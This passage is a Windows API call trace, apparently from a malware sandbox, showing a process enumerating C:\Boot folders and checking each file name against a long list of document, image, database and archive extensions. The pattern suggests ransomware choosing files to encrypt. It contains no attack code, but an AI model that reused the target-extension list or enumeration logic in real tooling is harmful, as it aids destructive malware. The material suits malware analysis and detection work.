lstrlenW (lpString=".phtml") returned 6 [0285.358] lstrcmpiW (lpString1=".phtml", lpString2="xe.mui") returned -1 [0285.358] lstrlenW (lpString=".pict") returned 5 [0285.359] lstrcmpiW (lpString1=".pict", lpString2="e.mui") returned -1 [0285.359] lstrlenW (lpString=".pl") returned 3 [0285.359] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0285.359] lstrlenW (lpString=".pls") returned 4 [0285.359] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0285.359] lstrlenW (lpString=".pm") returned 3 [0285.359] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0285.359] lstrlenW (lpString=".png") returned 4 [0285.359] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0285.359] lstrlenW (lpString=".pnm") returned 4 [0285.359] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0285.359] lstrlenW (lpString=".pot") returned 4 [0285.359] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0285.359] lstrlenW (lpString=".potm") returned 5 [0285.359] lstrcmpiW (lpString1=".potm", lpString2="e.mui") returned -1 [0285.359] lstrlenW (lpString=".potx") returned 5 [0285.359] lstrcmpiW (lpString1=".potx", lpString2="e.mui") returned -1 [0285.359] lstrlenW (lpString=".ppa") returned 4 [0285.359] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 [0285.359] lstrlenW (lpString=".ppam") returned 5 [0285.359] lstrcmpiW (lpString1=".ppam", lpString2="e.mui") returned -1 [0285.359] lstrlenW (lpString=".ppm") returned 4 [0285.359] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0285.359] lstrlenW (lpString=".pps") returned 4 [0285.359] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0285.359] lstrlenW (lpString=".ppsm") returned 5 [0285.359] lstrcmpiW (lpString1=".ppsm", lpString2="e.mui") returned -1 [0285.360] lstrlenW (lpString=".ppt") returned 4 [0285.360] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.360] lstrlenW (lpString=".pptm") returned 5 [0285.360] lstrcmpiW (lpString1=".pptm", lpString2="e.mui") returned -1 [0285.360] lstrlenW (lpString=".pptx") returned 5 [0285.360] lstrcmpiW (lpString1=".pptx", lpString2="e.mui") returned -1 [0285.360] lstrlenW (lpString=".prn") returned 4 [0285.360] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0285.360] lstrlenW (lpString=".ps") returned 3 [0285.360] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0285.360] lstrlenW (lpString=".psb") returned 4 [0285.360] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0285.360] lstrlenW (lpString=".psd") returned 4 [0285.360] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0285.360] lstrlenW (lpString=".pst") returned 4 [0285.360] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0285.360] lstrlenW (lpString=".ptx") returned 4 [0285.360] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0285.360] lstrlenW (lpString=".pub") returned 4 [0285.360] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0285.360] lstrlenW (lpString=".pwm") returned 4 [0285.360] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0285.360] lstrlenW (lpString=".pxr") returned 4 [0285.360] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0285.360] lstrlenW (lpString=".py") returned 3 [0285.360] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0285.360] lstrlenW (lpString=".qt") returned 3 [0285.361] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0285.361] lstrlenW (lpString=".r3d") returned 4 [0285.361] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0285.361] lstrlenW (lpString=".raf") returned 4 [0285.361] lstrcmpiW (lpString1=".raf", lpString2=".mui") returned 1 [0285.361] lstrlenW (lpString=".rar") returned 4 [0285.361] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.361] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0285.361] FindClose (in: hFindFile=0x3948168 | out: hFindFile=0x3948168) returned 1 [0285.361] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0285.361] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="et-EE", cAlternateFileName="")) returned 1 [0285.361] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0285.361] lstrlenW (lpString="C:\\Boot\\et-EE") returned 13 [0285.362] FindFirstFileW (in: lpFileName="C:\\Boot\\et-EE\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947c28 [0285.362] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.362] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.362] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0285.362] lstrlenW (lpString=".1cd") returned 4 [0285.362] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.362] lstrlenW (lpString=".3ds") returned 4 [0285.362] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0285.362] lstrlenW (lpString=".3fr") returned 4 [0285.362] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0285.362] lstrlenW (lpString=".3g2") returned 4 [0285.362] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0285.362] lstrlenW (lpString=".3gp") returned 4 [0285.362] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0285.362] lstrlenW (lpString=".7z") returned 3 [0285.362] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.362] lstrlenW (lpString=".accda") returned 6 [0285.362] lstrcmpiW (lpString1=".accda", lpString2="xe.mui") returned -1 [0285.362] lstrlenW (lpString=".accdb") returned 6 [0285.362] lstrcmpiW (lpString1=".accdb", lpString2="xe.mui") returned -1 [0285.363] lstrlenW (lpString=".accdc") returned 6 [0285.363] lstrcmpiW (lpString1=".accdc", lpString2="xe.mui") returned -1 [0285.363] lstrlenW (lpString=".accde") returned 6 [0285.363] lstrcmpiW (lpString1=".accde", lpString2="xe.mui") returned -1 [0285.363] lstrlenW (lpString=".accdt") returned 6 [0285.363] lstrcmpiW (lpString1=".accdt", lpString2="xe.mui") returned -1 [0285.363] lstrlenW (lpString=".accdw") returned 6 [0285.363] lstrcmpiW (lpString1=".accdw", lpString2="xe.mui") returned -1 [0285.363] lstrlenW (lpString=".adb") returned 4 [0285.363] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0285.363] lstrlenW (lpString=".adp") returned 4 [0285.363] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0285.363] lstrlenW (lpString=".ai") returned 3 [0285.363] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0285.363] lstrlenW (lpString=".ai3") returned 4 [0285.363] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0285.363] lstrlenW (lpString=".ai4") returned 4 [0285.363] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0285.363] lstrlenW (lpString=".ai5") returned 4 [0285.363] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0285.363] lstrlenW (lpString=".ai6") returned 4 [0285.363] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0285.363] lstrlenW (lpString=".ai7") returned 4 [0285.363] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0285.363] lstrlenW (lpString=".ai8") returned 4 [0285.363] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0285.363] lstrlenW (lpString=".anim") returned 5 [0285.363] lstrcmpiW (lpString1=".anim", lpString2="e.mui") returned -1 [0285.364] lstrlenW (lpString=".arw") returned 4 [0285.364] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0285.364] lstrlenW (lpString=".as") returned 3 [0285.364] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1 [0285.364] lstrlenW (lpString=".asa") returned 4 [0285.364] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0285.364] lstrlenW (lpString=".asc") returned 4 [0285.364] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0285.364] lstrlenW (lpString=".ascx") returned 5 [0285.364] lstrcmpiW (lpString1=".ascx", lpString2="e.mui") returned -1 [0285.364] lstrlenW (lpString=".asm") returned 4 [0285.364] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0285.364] lstrlenW (lpString=".asmx") returned 5 [0285.364] lstrcmpiW (lpString1=".asmx", lpString2="e.mui") returned -1 [0285.364] lstrlenW (lpString=".asp") returned 4 [0285.364] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0285.364] lstrlenW (lpString=".aspx") returned 5 [0285.364] lstrcmpiW (lpString1=".aspx", lpString2="e.mui") returned -1 [0285.364] lstrlenW (lpString=".asr") returned 4 [0285.364] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0285.364] lstrlenW (lpString=".asx") returned 4 [0285.364] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0285.364] lstrlenW (lpString=".avi") returned 4 [0285.364] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0285.364] lstrlenW (lpString=".avs") returned 4 [0285.364] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0285.364] lstrlenW (lpString=".backup") returned 7 [0285.365] lstrcmpiW (lpString1=".backup", lpString2="exe.mui") returned -1 [0285.365] lstrlenW (lpString=".bak") returned 4 [0285.365] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0285.365] lstrlenW (lpString=".bay") returned 4 [0285.365] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0285.365] lstrlenW (lpString=".bd") returned 3 [0285.365] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0285.365] lstrlenW (lpString=".bin") returned 4 [0285.365] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0285.365] lstrlenW (lpString=".bmp") returned 4 [0285.365] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0285.365] lstrlenW (lpString=".bz2") returned 4 [0285.365] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.365] lstrlenW (lpString=".c") returned 2 [0285.365] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0285.365] lstrlenW (lpString=".cdr") returned 4 [0285.365] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0285.365] lstrlenW (lpString=".cer") returned 4 [0285.365] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0285.365] lstrlenW (lpString=".cf") returned 3 [0285.365] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1 [0285.365] lstrlenW (lpString=".cfc") returned 4 [0285.365] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0285.365] lstrlenW (lpString=".cfm") returned 4 [0285.365] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0285.365] lstrlenW (lpString=".cfml") returned 5 [0285.365] lstrcmpiW (lpString1=".cfml", lpString2="e.mui") returned -1 [0285.365] lstrlenW (lpString=".cfu") returned 4 [0285.365] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0285.366] lstrlenW (lpString=".chm") returned 4 [0285.366] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0285.366] lstrlenW (lpString=".cin") returned 4 [0285.366] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0285.366] lstrlenW (lpString=".class") returned 6 [0285.366] lstrcmpiW (lpString1=".class", lpString2="xe.mui") returned -1 [0285.366] lstrlenW (lpString=".clx") returned 4 [0285.366] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0285.366] lstrlenW (lpString=".config") returned 7 [0285.366] lstrcmpiW (lpString1=".config", lpString2="exe.mui") returned -1 [0285.366] lstrlenW (lpString=".cpp") returned 4 [0285.366] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0285.366] lstrlenW (lpString=".cr2") returned 4 [0285.366] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0285.366] lstrlenW (lpString=".crt") returned 4 [0285.366] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0285.366] lstrlenW (lpString=".crw") returned 4 [0285.366] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0285.366] lstrlenW (lpString=".cs") returned 3 [0285.366] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0285.366] lstrlenW (lpString=".css") returned 4 [0285.366] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0285.366] lstrlenW (lpString=".csv") returned 4 [0285.366] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0285.366] lstrlenW (lpString=".cub") returned 4 [0285.366] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0285.366] lstrlenW (lpString=".dae") returned 4 [0285.366] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0285.366] lstrlenW (lpString=".dat") returned 4 [0285.367] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0285.367] lstrlenW (lpString=".db") returned 3 [0285.367] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0285.367] lstrlenW (lpString=".dbf") returned 4 [0285.367] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.367] lstrlenW (lpString=".dbx") returned 4 [0285.367] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0285.367] lstrlenW (lpString=".dc3") returned 4 [0285.367] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0285.367] lstrlenW (lpString=".dcm") returned 4 [0285.367] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0285.367] lstrlenW (lpString=".dcr") returned 4 [0285.367] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0285.367] lstrlenW (lpString=".der") returned 4 [0285.367] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0285.367] lstrlenW (lpString=".dib") returned 4 [0285.367] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0285.367] lstrlenW (lpString=".dic") returned 4 [0285.367] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0285.539] lstrlenW (lpString=".dif") returned 4 [0285.539] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0285.539] lstrlenW (lpString=".divx") returned 5 [0285.539] lstrcmpiW (lpString1=".divx", lpString2="e.mui") returned -1 [0285.539] lstrlenW (lpString=".djvu") returned 5 [0285.539] lstrcmpiW (lpString1=".djvu", lpString2="e.mui") returned -1 [0285.539] lstrlenW (lpString=".dng") returned 4 [0285.539] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0285.539] lstrlenW (lpString=".doc") returned 4 [0285.539] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.539] lstrlenW (lpString=".docm") returned 5 [0285.539] lstrcmpiW (lpString1=".docm", lpString2="e.mui") returned -1 [0285.539] lstrlenW (lpString=".docx") returned 5 [0285.539] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.540] lstrlenW (lpString=".dot") returned 4 [0285.540] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0285.540] lstrlenW (lpString=".dotm") returned 5 [0285.540] lstrcmpiW (lpString1=".dotm", lpString2="e.mui") returned -1 [0285.540] lstrlenW (lpString=".dotx") returned 5 [0285.540] lstrcmpiW (lpString1=".dotx", lpString2="e.mui") returned -1 [0285.540] lstrlenW (lpString=".dpx") returned 4 [0285.540] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0285.540] lstrlenW (lpString=".dqy") returned 4 [0285.540] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0285.540] lstrlenW (lpString=".dsn") returned 4 [0285.540] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0285.540] lstrlenW (lpString=".dt") returned 3 [0285.540] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0285.540] lstrlenW (lpString=".dtd") returned 4 [0285.540] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0285.540] lstrlenW (lpString=".dwg") returned 4 [0285.540] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0285.540] lstrlenW (lpString=".dwt") returned 4 [0285.540] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0285.540] lstrlenW (lpString=".dx") returned 3 [0285.540] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0285.540] lstrlenW (lpString=".dxf") returned 4 [0285.540] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0285.540] lstrlenW (lpString=".edml") returned 5 [0285.540] lstrcmpiW (lpString1=".edml", lpString2="e.mui") returned -1 [0285.540] lstrlenW (lpString=".efd") returned 4 [0285.540] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0285.541] lstrlenW (lpString=".elf") returned 4 [0285.541] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0285.541] lstrlenW (lpString=".emf") returned 4 [0285.541] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0285.541] lstrlenW (lpString=".emz") returned 4 [0285.541] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0285.541] lstrlenW (lpString=".epf") returned 4 [0285.541] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0285.541] lstrlenW (lpString=".eps") returned 4 [0285.541] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0285.541] lstrlenW (lpString=".epsf") returned 5 [0285.541] lstrcmpiW (lpString1=".epsf", lpString2="e.mui") returned -1 [0285.541] lstrlenW (lpString=".epsp") returned 5 [0285.541] lstrcmpiW (lpString1=".epsp", lpString2="e.mui") returned -1 [0285.541] lstrlenW (lpString=".erf") returned 4 [0285.541] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0285.541] lstrlenW (lpString=".exr") returned 4 [0285.541] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0285.541] lstrlenW (lpString=".f4v") returned 4 [0285.541] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0285.541] lstrlenW (lpString=".fido") returned 5 [0285.541] lstrcmpiW (lpString1=".fido", lpString2="e.mui") returned -1 [0285.541] lstrlenW (lpString=".flm") returned 4 [0285.541] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0285.541] lstrlenW (lpString=".flv") returned 4 [0285.541] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0285.542] lstrlenW (lpString=".frm") returned 4 [0285.542] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0285.542] lstrlenW (lpString=".fxg") returned 4 [0285.542] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0285.542] lstrlenW (lpString=".geo") returned 4 [0285.542] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0285.542] lstrlenW (lpString=".gif") returned 4 [0285.542] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0285.542] lstrlenW (lpString=".grs") returned 4 [0285.542] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0285.542] lstrlenW (lpString=".gz") returned 3 [0285.542] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0285.542] lstrlenW (lpString=".h") returned 2 [0285.542] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0285.542] lstrlenW (lpString=".hdr") returned 4 [0285.542] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0285.542] lstrlenW (lpString=".hpp") returned 4 [0285.542] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0285.542] lstrlenW (lpString=".hta") returned 4 [0285.542] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0285.542] lstrlenW (lpString=".htc") returned 4 [0285.542] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0285.542] lstrlenW (lpString=".htm") returned 4 [0285.542] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0285.542] lstrlenW (lpString=".html") returned 5 [0285.542] lstrcmpiW (lpString1=".html", lpString2="e.mui") returned -1 [0285.542] lstrlenW (lpString=".icb") returned 4 [0285.542] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0285.543] lstrlenW (lpString=".ics") returned 4 [0285.543] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0285.543] lstrlenW (lpString=".iff") returned 4 [0285.543] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0285.543] lstrlenW (lpString=".inc") returned 4 [0285.543] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0285.543] lstrlenW (lpString=".indd") returned 5 [0285.543] lstrcmpiW (lpString1=".indd", lpString2="e.mui") returned -1 [0285.543] lstrlenW (lpString=".ini") returned 4 [0285.543] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0285.543] lstrlenW (lpString=".iqy") returned 4 [0285.543] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1 [0285.543] lstrlenW (lpString=".j2c") returned 4 [0285.543] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0285.543] lstrlenW (lpString=".j2k") returned 4 [0285.543] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0285.543] lstrlenW (lpString=".java") returned 5 [0285.543] lstrcmpiW (lpString1=".java", lpString2="e.mui") returned -1 [0285.543] lstrlenW (lpString=".jp2") returned 4 [0285.543] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0285.543] lstrlenW (lpString=".jpc") returned 4 [0285.543] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0285.543] lstrlenW (lpString=".jpe") returned 4 [0285.543] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0285.543] lstrlenW (lpString=".jpeg") returned 5 [0285.543] lstrcmpiW (lpString1=".jpeg", lpString2="e.mui") returned -1 [0285.543] lstrlenW (lpString=".jpf") returned 4 [0285.544] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0285.544] lstrlenW (lpString=".jpg") returned 4 [0285.544] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.544] lstrlenW (lpString=".jpx") returned 4 [0285.544] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0285.544] lstrlenW (lpString=".js") returned 3 [0285.544] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0285.544] lstrlenW (lpString=".jsf") returned 4 [0285.544] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1 [0285.544] lstrlenW (lpString=".json") returned 5 [0285.544] lstrcmpiW (lpString1=".json", lpString2="e.mui") returned -1 [0285.544] lstrlenW (lpString=".jsp") returned 4 [0285.544] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0285.544] lstrlenW (lpString=".kdc") returned 4 [0285.544] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0285.544] lstrlenW (lpString=".kmz") returned 4 [0285.544] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0285.544] lstrlenW (lpString=".kwm") returned 4 [0285.544] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0285.544] lstrlenW (lpString=".lasso") returned 6 [0285.544] lstrcmpiW (lpString1=".lasso", lpString2="xe.mui") returned -1 [0285.544] lstrlenW (lpString=".lbi") returned 4 [0285.544] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0285.544] lstrlenW (lpString=".lgf") returned 4 [0285.544] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0285.544] lstrlenW (lpString=".lgp") returned 4 [0285.544] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 [0285.545] lstrlenW (lpString=".log") returned 4 [0285.545] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0285.545] lstrlenW (lpString=".m1v") returned 4 [0285.545] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0285.545] lstrlenW (lpString=".m4a") returned 4 [0285.545] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0285.545] lstrlenW (lpString=".m4v") returned 4 [0285.545] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0285.545] lstrlenW (lpString=".max") returned 4 [0285.545] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0285.545] lstrlenW (lpString=".md") returned 3 [0285.545] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0285.545] lstrlenW (lpString=".mda") returned 4 [0285.545] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0285.545] lstrlenW (lpString=".mdb") returned 4 [0285.545] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0285.545] lstrlenW (lpString=".mde") returned 4 [0285.545] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0285.545] lstrlenW (lpString=".mdf") returned 4 [0285.545] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0285.545] lstrlenW (lpString=".mdw") returned 4 [0285.545] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0285.545] lstrlenW (lpString=".mef") returned 4 [0285.545] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0285.545] lstrlenW (lpString=".mft") returned 4 [0285.545] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0285.545] lstrlenW (lpString=".mfw") returned 4 [0285.546] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0285.546] lstrlenW (lpString=".mht") returned 4 [0285.546] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0285.546] lstrlenW (lpString=".mhtml") returned 6 [0285.546] lstrcmpiW (lpString1=".mhtml", lpString2="xe.mui") returned -1 [0285.546] lstrlenW (lpString=".mka") returned 4 [0285.546] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0285.546] lstrlenW (lpString=".mkidx") returned 6 [0285.546] lstrcmpiW (lpString1=".mkidx", lpString2="xe.mui") returned -1 [0285.546] lstrlenW (lpString=".mkv") returned 4 [0285.546] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0285.546] lstrlenW (lpString=".mos") returned 4 [0285.546] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0285.546] lstrlenW (lpString=".mov") returned 4 [0285.546] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0285.546] lstrlenW (lpString=".mp3") returned 4 [0285.546] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 